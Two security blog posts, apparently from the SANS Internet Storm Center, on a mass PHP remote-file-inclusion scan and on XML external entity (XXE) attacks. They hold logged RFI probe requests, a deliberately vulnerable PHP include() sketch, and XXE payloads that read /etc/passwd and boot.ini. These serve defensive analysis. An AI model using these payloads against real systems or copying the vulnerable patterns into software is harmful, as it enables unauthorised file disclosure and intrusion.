Massive PHP RFI scans

Published: 2014-01-09. Last Updated: 2014-01-11 11:02:29 UTC
by Bojan Zdrnja (Version: 2)
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scan. Yinette has been seeing this activity for quite some time, and the number of requests sent by this (as yet unidentified) bot or botnet has kept rising.
Judging by the source IP addresses, the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.
 
The scanning requests come in relatively fast: in the capture Yinette made, the bot consistently sent at least two requests per second. Every request tries to exploit an RFI vulnerability (I haven’t checked whether all of them are well known, but a cursory inspection suggests most are), and the file being included is the static humans.txt file on Google (http://www.google.com/humans.txt).
 
The bot almost certainly parses the output: if it sees the contents of the humans.txt file, it knows that the site has an RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help, of course.
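 
The kind of code these scans are probing for looks roughly like the sketch below. This is a hypothetical, simplified example – the parameter name is borrowed from the phpBB-style requests shown below, not from any specific product:
 
<?php
// Hypothetical RFI-vulnerable pattern (simplified for illustration):
// a path is taken straight from the request and handed to include().
// If php.ini has allow_url_include = On (and allow_url_fopen = On),
// the "path" can be a full URL, so the remote file is fetched and
// executed/echoed by the server.
$root = $_GET['phpbb_root_path'];   // e.g. http://www.google.com/humans.txt?
include($root . 'common.php');      // the trailing "?" turns 'common.php' into a query string
 
If the include succeeds, the response contains the text of humans.txt, which is all the bot needs to see in order to flag the site as vulnerable.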
 
Some observed requests are shown below:
 
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
 
This is only a small part of all the requests the bot sends. In total it sent 804 requests to Yinette’s web site (that’s 804 vulnerabilities it is trying to exploit)! This might indeed be someone trying to build a big(ger) botnet.

Are you seeing the same or similar requests on your web site? Or have you perhaps managed to catch the bot on a compromised machine or a honeypot? Let us know!

UPDATE:

We received a lot of submissions regarding this – thanks to everyone who sent in their logs and observations! After analyzing the logs we received, it appears that these scans started around the 21st of December 2013 and are still going on.
 
Also, it appears that Yinette’s capture caught only part of the attack. We received several submissions showing the exact requests (which, fortunately, resulted in 404 errors for most of them :)).
 
The total number of requests is even higher – the bot tries to access 2217 (!!!) URIs. Every URI accessed corresponds to an RFI vulnerability, and the requests always (at least in these attacks) try to retrieve the humans.txt file from Google (it would be interesting if someone at Google could analyze their logs of requests for this file).
 
So, this is getting pretty large. Unfortunately we haven’t seen the bot’s code so far – if you do manage to catch it, please upload it through our contact form so we can analyze it.

--
Bojan
@bojanz
INFIGO IS

Keywords: rfi scan

Is XXE the new SQLi?

Published: 2014-01-09. Last Updated: 2014-01-09 08:37:00 UTC
by Bojan Zdrnja (Version: 1)
Many modern applications use XML documents to transfer data between clients and servers. Due to its simplicity, XML is well suited for this and is therefore very often used to represent various data structures.
 
Typically, a rich web application will use XML to send data from the client to the server. This XML document, which might contain various data structures related to the web application, is then processed on the server side. Here we run into a typical untrusted-input problem: since an attacker can control anything on the client side, he can tamper with the XML document that is submitted to the server. Generally this should not be a problem – unless the following happens.
 
Since the web application on the server side receives the XML document we just sent, it has to parse it somehow. Depending on the framework, the application is most often (especially for business applications) either a Java or a .NET application; other frameworks typically rely on libxml2.
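 
As a minimal sketch of what that parsing step can look like, here is a hypothetical PHP endpoint using DOMDocument (which is backed by libxml2); the element name is made up purely for illustration:
 
<?php
// Hypothetical endpoint: read the raw request body and parse it as XML.
$body = file_get_contents('php://input');

$dom = new DOMDocument();
$dom->loadXML($body);   // how (un)safe this is depends on the parser's entity handling, discussed below

// the application then works with the attacker-controlled structure
$comment = $dom->getElementsByTagName('comment')->item(0);
echo $comment ? $comment->nodeValue : '';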
 
The security problem here lies in a special structure defined by the XML standard: the entity. Every entity has certain content, and entities are normally referenced throughout the XML document. However, one specific entity type is particularly dangerous: the external entity.
 
External entity declarations come in two flavors: SYSTEM and PUBLIC. The SYSTEM external entity is the one we are interested in – it lets you specify a URI that will be dereferenced, with the retrieved content replacing the entity. One example of such an entity is shown below:
 
<!ENTITY ISCHandler
SYSTEM "https://isc.sans.edu/api/handler">
 
Now, when parsing such an XML document, wherever the ISCHandler entity is referenced the parser will replace it with the contents retrieved from that URI. Pretty bad already, isn’t it? But it gets even worse – by exploiting this we can include any local file simply by pointing to it:
 
<!ENTITY ISCHandler
SYSTEM "file:///etc/passwd">
 
Or on Windows:
 
<!ENTITY ISCHandler
SYSTEM "file:///C:/boot.ini">
 
As long as the current process has privileges to read the requested file, the XML parser will simply retrieve it and insert its contents wherever it finds a reference to the ISCHandler entity (&ISCHandler;).
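 
Putting the pieces together, a complete malicious document could look like the one below – the entity is declared in the document’s internal DTD subset and then referenced in the body (the element names are made up for illustration):
 
<?xml version="1.0"?>
<!DOCTYPE request [
  <!ENTITY ISCHandler SYSTEM "file:///etc/passwd">
]>
<request>
  <comment>&ISCHandler;</comment>
</request>
 
A vulnerable parser will return the <comment> element with the contents of /etc/passwd substituted in.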
 
The impact of such a vulnerability is pretty obvious. A malicious attacker can actually do much more – just use your imagination:
  • We can probably DoS the application by reading from a file such as /dev/random or /dev/zero.
  • We can port scan internal IP addresses, or at least try to find internal web servers.
Probably the most dangerous “feature”, though, is data extraction – similarly to how we would pull data from a database through a SQL injection vulnerability, we can read (almost) any file on the hard disk. This includes not only the password file but potentially more sensitive files such as DB connection parameters and so on. Depending on the framework, including a directory will even give us the directory’s listing, so we don’t have to blindly guess file names! Very nasty.
Everything so far is really nothing new; however, in the last X pentesting engagements XXE vulnerabilities have, for some reason, started popping up. So what is the reason for that? First of all, some libraries allow external entity definitions by default. In such cases, the developer has to explicitly disable the inclusion of external entities. This is probably still the case for Java XML libraries, while with .NET 4.0 Microsoft changed the default behavior to disallow external entities (in .NET 3.5 they are allowed).
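 
To illustrate with libxml2 as used from PHP (the Java and .NET specifics are as described above and not shown here; this is just a sketch of the general idea):
 
<?php
$untrustedXml = file_get_contents('php://input');

// Dangerous: LIBXML_NOENT tells libxml2 to substitute entities,
// including external ones, while parsing untrusted input.
$dom = new DOMDocument();
$dom->loadXML($untrustedXml, LIBXML_NOENT);

// Safer: don't enable entity substitution, and additionally forbid
// loading of external entities altogether (available since PHP 5.2.11).
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($untrustedXml);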
 
So, while XXE will not become as dangerous as SQLi (hey, the subject was there to get your attention), we do find these vulnerabilities more often than before, which means we should raise awareness about them.
 
--
Bojan
@bojanz
INFIGO IS
Keywords: xxe
